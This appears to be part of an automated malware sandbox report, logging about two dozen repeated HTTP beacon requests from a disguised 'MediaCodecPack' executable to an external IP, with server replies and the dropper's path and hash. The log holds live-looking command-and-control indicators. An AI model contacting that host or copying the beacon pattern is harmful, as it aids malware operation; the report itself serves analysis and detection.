                                                                              Data Ascii: 26a8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049873188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:57 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:50:58 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:50:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:50:58 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049881188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:50:59 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:00 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:00 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1049887188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:02 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:02 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:02 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1049896188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:04 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:05 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:05 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.1049901188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:07 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:07 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:07 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.1049905188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:09 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:10 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:10 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.1049910188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:11 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:12 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:12 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.1049916188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:13 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:14 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:14 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.1049923188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:16 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:17 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:17 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.1049930188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:19 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:19 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:19 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.1049936188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:21 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:22 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:22 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.1049943188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:23 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:24 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:24 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.1049950188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:26 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:26 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:26 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.1049956188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:28 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:29 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:29 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.1049963188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:30 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:31 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:31 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.1049969188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:33 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:34 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:34 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.1049975188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:35 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:36 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:36 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.1049981188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:38 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:38 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:38 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.1049989188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:40 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:41 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:41 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.1049995188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:43 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:43 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:43 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.1050001188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:45 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:46 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:46 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.1050004188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:48 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:48 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:48 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.1050005188.119.66.1854437404C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-18 12:51:50 UTC291OUTGET /ai/?key=8f3f2b3ab913463e2a4cb7a3231e72eee7c4db7e40b92a8dcd6c946b46b3478c9e7c4ce711c34f7f637af3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d09055 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Host: 188.119.66.185
                                                                              2024-12-18 12:51:51 UTC200INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 18 Dec 2024 12:51:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Powered-By: PHP/7.4.33
                                                                              2024-12-18 12:51:51 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e8b723663ec13250


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:07:49:46
                                                                              Start date:18/12/2024
                                                                              Path:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\newwork.exe.1.exe"
                                                                              Imagebase:0x400000
                                                                              File size:3'314'669 bytes
                                                                              MD5 hash:27B4FA67C0810BC212077971A00854EA
